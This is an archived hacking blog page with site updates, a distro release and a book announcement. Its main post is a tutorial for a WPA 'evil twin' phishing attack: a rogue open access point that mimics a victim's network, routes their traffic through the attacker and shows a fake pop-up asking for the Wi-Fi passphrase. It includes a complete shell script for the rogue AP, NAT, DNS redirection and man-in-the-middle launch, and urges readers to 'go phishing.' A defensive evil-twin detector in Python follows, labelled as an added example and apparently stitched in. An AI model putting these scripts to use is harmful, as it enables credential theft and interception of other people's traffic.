
Archive for the ‘Updates’ Category

Site Updates

Wednesday, March 19th, 2014

I have decided that all of the fancy CSS3 stuff had to go. It looked bad on mobile devices and such. So, I have changed the look of the landing page and moved some things around here on the site itself. All publications are in one place, all music in one place, etc. Anyone want to let me know how it all looks on their mobile device(s)? Thanks!

~Douglas

Bringing Back the WPA Phishing Attack

Friday, July 19th, 2013

It’s hard to keep up with every project I start since I am a one man band as of late. I do admit that I love the RF hacking projects the most! One of them, the WPA Phishing Attack, was a simple way to phish a WPA/WPA2/WPA2 Enterprise password without the use of FreeRADIUS-WPE. It simply creates a fake AP that a user can connect to outside of the physical area in which the victim AP is located. Then, it forwards all traffic through the attacker machine, and when a web browser is opened by the victim, he or she will be presented with a fake Windows/OSX pop-up window that “requires” a WiFi pass-phrase again.

For instance, say a victim is using “WorkAP” and heads over to another building where the WorkAP or mesh does not reach. Next, the attacker starts the evil twin AP called “WorkAP” without any encryption enabled and awaits clients. (You MUST wait for clients before running the ./MiTM.sh file or Ettercap will kill the window.) Usually what happens when someone sees an AP of the same name is they just click connect. Once connected, they are presented with a password input for the WiFi network once the browser opens. Here is a video presentation I made back in 2010 and published on YouTube in Feb of 2011:

This new tutorial below is another one provided by The Musket Team and was posted in the comments section of my original WPA Phishing Attack Presentation weblog post. I have edited it slightly and styled it. Thank you Musket Team!

The WPA Phishing program in both WeakNet Linux 3.6 and 4.2 has several bugs.
For example, in the WeaknetAP.sh file the line:
firefox http://127.0.0.1/wpa-credcheck.php &
points to a file in the /var/www folder that does not exist. And there are others.

The Musket Team has gotten the program to run in both WeakNet Linux versions. Here is a step by step method.
The program requires a dhcp-server file placed in the /etc/init.d/ folder.
Write the following with a text editor and name it dhcp-server. Make sure in the properties-permissions you check to allow executing the file as a program.

#!/bin/sh
#############start of dhcp-server file#########
###location= /etc/init.d/ #################
#
### BEGIN INIT INFO
# Provides: dhcp-server
# Required-Start: $remote_fs $network $syslog
# Required-Stop: $remote_fs $network $syslog
# Should-Start: $local_fs slapd $named
# Should-Stop: $local_fs slapd
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: DHCP server
# Description: Dynamic Host Configuration Protocol Server
### END INIT INFO

PATH=/sbin:/bin:/usr/sbin:/usr/bin

# Nothing to do if the daemon binary is not installed.
test -f /usr/sbin/dhcpd || exit 0

# It is not safe to start if we don't have a default configuration...
if [ ! -f /etc/default/dhcp-server ]; then
    echo "/etc/default/dhcp-server does not exist! - Aborting..."
    echo "Run 'dpkg-reconfigure dhcp-server' to fix the problem."
    exit 0
fi

. /lib/lsb/init-functions

# Read init script configuration (so far only interfaces the daemon
# should listen on.)
[ -f /etc/default/dhcp-server ] && . /etc/default/dhcp-server

NAME=dhcpd
DESC="DHCP server"
DHCPDPID=/var/run/dhcpd.pid

# Ask dhcpd to parse its configuration without starting; abort on error.
test_config()
{
    if ! /usr/sbin/dhcpd -t -q > /dev/null 2>&1; then
        echo "dhcpd self-test failed. Please fix the config file."
        echo "The error was: "
        /usr/sbin/dhcpd -t
        exit 1
    fi
}

# single arg is -v for messages, -q for none
check_status()
{
    if [ ! -r "$DHCPDPID" ]; then
        test "$1" != -v || echo "$NAME is not running."
        return 3
    fi
    # Read the PID from the pidfile and check that such a process exists.
    if read pid < "$DHCPDPID" && ps -p "$pid" > /dev/null 2>&1; then
        test "$1" != -v || echo "$NAME is running."
        return 0
    else
        test "$1" != -v || echo "$NAME is not running but $DHCPDPID exists."
        return 1
    fi
}

case "$1" in
    start)
        test_config
        log_daemon_msg "Starting $DESC" "$NAME"
        start-stop-daemon --start --quiet --pidfile $DHCPDPID \
            --exec /usr/sbin/dhcpd -- -q $INTERFACES
        sleep 2

        if check_status -q; then
            log_end_msg 0
        else
            log_failure_msg "check syslog for diagnostics."
            log_end_msg 1
            exit 1
        fi
        ;;
    stop)
        log_daemon_msg "Stopping $DESC" "$NAME"
        start-stop-daemon --stop --quiet --pidfile $DHCPDPID
        log_end_msg $?
        rm -f "$DHCPDPID"
        ;;
    restart | force-reload)
        test_config
        $0 stop
        sleep 2
        $0 start
        if [ "$?" != "0" ]; then
            exit 1
        fi
        ;;
    status)
        echo -n "Status of $DESC: "
        check_status -v
        exit "$?"
        ;;
    *)
        echo "Usage: $0 {start|stop|restart|force-reload|status}"
        exit 1
esac

exit 0
#############end of dhcp-server file ############

The WeaknetAP.sh file has other bugs. Here is a complete rewrite for you to test. Write the following with a text editor, name the file WeakNetAP.sh, then copy it to /pwnt/WiFu/airbase-ng/. Again, make sure in the properties-permissions you check to allow executing the file as a program.

#!/bin/bash
#################start of WeakNetAP.sh ################
# location= /pwnt/WiFu/airbase-ng/
# WeakAP startup script: (c) 2010 GNU License.
#
# Written by Trevelyn
# Douglas[at]WeakNetLabs[dot]com
# for WeakNet Linux 4.2i
#
# This creates a Rogue AP from your device,
# Starts DHCP Server in the range 192.168.0.0,
# Forwards all traffic caught to your internet connection
# and starts capturing packets, creating a PCAP file.
# --> Creating a highly advanced MITM attack.
#
# This script was meant to be an "out of the box" attack
# setup for WeakNet linux Version 4.2i users.
#
# This application comes without warranty, I am not responsible
# For any damages caused by using this script.
#
# Please refer to the GNU license included in the Tarball.
#
# Start the web server now:
/etc/init.d/lighttpd start
# open firefox to the credentials checker:
firefox http://127.0.0.1/wpa.php &
#
devchk=`iwconfig 2>/dev/null | grep Monitor`;
# clean up services before starting...
/etc/init.d/dhcp3-server stop
killall -9 dhclient
killall -9 dhclient3
killall -9 dnsspoof
killall -9 ettercap
# begin:
echo "<<>>"
if [ "$devchk" != "" ]; then
    echo "[ + ] Good you have a Monitor enabled WiFu Device :-)"
else
    echo "[ X ] You have no Monitor mode enabled device!"
    echo "[ X ] Let's create one..."
    devmk=`iwconfig 2>/dev/null | grep -m 1 IEEE | awk '{print $1}'`
    ifconfig $devmk up && iwconfig $devmk channel 11
    echo "[ + ] Creating device from $devmk"
    if [ "$devmk" = "ath0" ]; then
        airmon-ng stop ath0;
        airmon-ng start wifi0;
    else
        airmon-ng start $devmk 2>/dev/null
    fi

    DEV=`iwconfig 2>/dev/null | grep -m 1 IEEE | awk '{print $1}'`
    iwconfig $DEV channel 11
    iwconfig $DEV channel 11
    iwconfig $DEV channel 11
    if [ "$DEV" != "" ]; then
        echo "[ ! ] Done, our new device is $DEV"
    else
        echo "[ X ] Something went really wrong! :-("
        echo "[ X ] Please Check your settings and try again."
    fi
fi
DEV=`iwconfig 2>/dev/null | grep Monitor | awk '{print $1}'`
echo "Shall we use $DEV as our Monitor device? (y/n)"
read foo;

if [ "$foo" = "n" ]
then echo "Which monitor enabled device shall I use?"
    read DEV
fi

echo "What would you like to name the AP? (ESSID)"
read ESSID
echo "Which channel should the AP use? (CHANNEL)"
read CHANNEL
echo "[ + ] Starting soft AP in new Eterm window, for debugging with $DEV"
echo "[ > ] And ESSID: $ESSID"
echo "[ > ] And CHANNEL: $CHANNEL"
Eterm -e sh -c "airbase-ng -c $CHANNEL -C 30 --essid $ESSID -v $DEV; bash" &
sleep 2;
echo "[ + ] adding route for packet forwarding..."
ifconfig at0 up 192.168.0.1
ifconfig at0 netmask 255.255.255.0
ff=`ifconfig | grep "at0" | awk '{print $1}'`
if [ "$ff" = "at0" ]
then echo "[ + ] at0 is on and up"
else echo "[ X ] at0 is not up, something went wrong"
fi
echo "[ + ] at0 device is now in IP range: 192.168.0.1~254..."
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
echo "[ + ] cleaning out iptables settings..."
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[ + ] changing iptables to forward packets..."
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o at0 -j MASQUERADE
echo "[ + ] changing '/proc/sys/net/ipv4/ip_forward' to allow forwarding..."
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "[ + ] Adding new rules to iptables to forward packets from at0 to wlan0"
echo "[ > ] Make sure you have an IP with wlan0!"
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.10.0.1
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo "[ + ] Backing up DHCP3 configuration file to /etc/dhcp3/dhcpd.conf.backup..."
cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
echo "[ + ] Dumping contents from /pwnt/WiFu/airbase-ng/dhcpd3-server.conf into /etc/dhcp3/ file..."
cat dhcpd3-server.conf > /etc/dhcp3/dhcpd.conf
ifconfig at0 up 192.168.0.1 netmask 255.255.255.0
/etc/init.d/lighttpd start
echo "[ + ] Starting DHCP server with configuration from /etc/dhcp3/dhcpd.conf"
/etc/init.d/isc-dhcp-server start
echo "[ ! ] All done with script, hope all is up and running! :-)"
echo "[ ? ] Would you like to start a MITM attack against all requests?"
echo "[ ! ] Wait until you see an association in the airbase-ng window before running."
echo "[ ! ] If it fails, simply run ./MITM.sh again until it starts."
echo "[ ? ] This is perfect for faking RADIUS authentication."
echo "[ ? ] (y/n)?"
read ans
if [ "$ans" = "y" ]
then ./MITM.sh &
else
    echo "Okay Then!"
fi
#################end of WeakNetAP.sh ################

Other considerations. We suggest you start your wifi adapter in monitor mode before you run the program. At start you might get error messages as the program tries to kill nonexistent programs.

You must download the WPA phishing files from WeakNet Labs, then place them in the /var/www/ folder. Make sure you allow read-write to these files and, again, make sure in the properties-permissions you check to allow executing these files as a program. If firefox gives you the wrong files etc., point it to 127.0.0.1 and/or make sure the permissions are correct, then shut down, restart and go phishing again.

You can keep the original WeakNetAP.sh; just rename it to WeakNetAP.sh.orig.
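From the defender's side, the evil twin described above has two visible tells: a BSSID broadcasting a trusted ESSID that is not in the AP inventory, and that ESSID being offered with weaker security (open instead of WPA2) than the real network. The following Python is an added example, not code from WeakNet Labs or the Musket Team; the inventory, the scan records and the BSSIDs in it are all constructed for illustration.

```python
"""Flag evil-twin candidates in a Wi-Fi scan against an inventory of trusted APs."""

# Constructed inventory of the legitimate APs: ESSID -> expected security and known BSSIDs.
TRUSTED = {
    "WorkAP": {
        "security": "WPA2-Enterprise",
        "bssids": {"00:11:22:33:44:55", "00:11:22:33:44:56"},
    },
}

# Security labels ordered from weakest to strongest, used to detect a downgrade.
SECURITY_RANK = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA2-Enterprise": 4}

# Constructed scan records, (bssid, essid, security), as a scanner would report them.
SCAN = [
    ("00:11:22:33:44:55", "WorkAP", "WPA2-Enterprise"),
    ("00:11:22:33:44:56", "WorkAP", "WPA2-Enterprise"),
    ("DE:AD:BE:EF:00:01", "WorkAP", "OPN"),        # open twin using our ESSID
    ("aa:bb:cc:dd:ee:ff", "CoffeeShop", "OPN"),    # not our network, ignored
]


def find_evil_twins(trusted, scan):
    """Return (bssid, essid, reason) findings for APs that impersonate a trusted ESSID."""
    findings = []
    for bssid, essid, security in scan:
        profile = trusted.get(essid)
        if profile is None:
            continue  # ESSID is not ours, so twin detection does not apply
        bssid = bssid.lower()  # normalise case before comparing with the inventory
        if bssid not in profile["bssids"]:
            findings.append((bssid, essid, "unknown BSSID for trusted ESSID"))
        expected = SECURITY_RANK.get(profile["security"], 0)
        observed = SECURITY_RANK.get(security, 0)
        if observed < expected:
            reason = "security downgrade %s -> %s" % (profile["security"], security)
            findings.append((bssid, essid, reason))
    return findings


if __name__ == "__main__":
    for bssid, essid, reason in find_evil_twins(TRUSTED, SCAN):
        print("[!] %s %s: %s" % (essid, bssid, reason))
```

Feeding the same function with the output of a periodic scan from a wireless IDS sensor gives an alert the moment an open "WorkAP" shows up outside the inventory.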

WEAKERTH4N: Blue Ghost BETA v1.5

Sunday, March 17th, 2013

I recompiled the kernel with better Netfilter support and even more wifi drivers, and I recompiled the NVIDIA 310 driver and compat-drivers. I added FreeRADIUS WPE, hostapd, hashcat, more scripts, and even on-screen display scripts (the WiFi one was m33b0’s idea). Also, I added more hardware hacking utilities, Android hacking utilities, and changed the Grub screen resolution and configuration for faster booting.

Download it now! (hr.weaknetlabs.com) Thank you HaxRadio for hosting! :D

~Douglas

Book Published!

Friday, January 18th, 2013

01.18.2013 – RAIDING the Wireless Empire has been published!

Physical books

Purchase from publisher: https://www.createspace.com/3558592
Purchase signed copy from us: WeakNetLabs/book/

eBook Version from Amazon

Kindle version and physical book will be available on Amazon in approximately 12 hours. Click the image below to see what it looks like on the Kindle Fire HD.

Thank you all for following my site over the years! So far, it’s been a fun ride :) So, here is a small free preview from the book in PDF format:

Thank you Fixer and Brad Carter for all of the help!

~Douglas.

Simple Google Text Browser, Book, Soundcloud

Monday, January 7th, 2013

pWeb Suite

./sgtb has been updated to accept complicated Google dorks, thanks to a BUG found by m33b0! :) Click Here for the updated version, and thanks for all of the feedback on the pWeb Suite! :)

Tested new dork example:

I’m still trying my best to get rid of all of the garbage that Google throws into its search results. It sadly seems that as time goes by, the simple search engine is getting more and more convoluted and full of ads and garbage. I was sad the day they dropped this style of dork: ‘”a string goes here”+word’, but whatever, they need profits too, I guess. This is really why I made this application anyway. Plus the bot protection is awful and blocks almost 60% of all Tor IPs.

book

Thanks for all the inquiries about the book; it is complete and will be available here soon. I am just waiting for the final edit from the editor.

Music

Not sure if you guise noticed or not, but I changed the icons in the bottom left of the site and moved some music off to our very own Soundcloud site!

Thanks!
~Douglas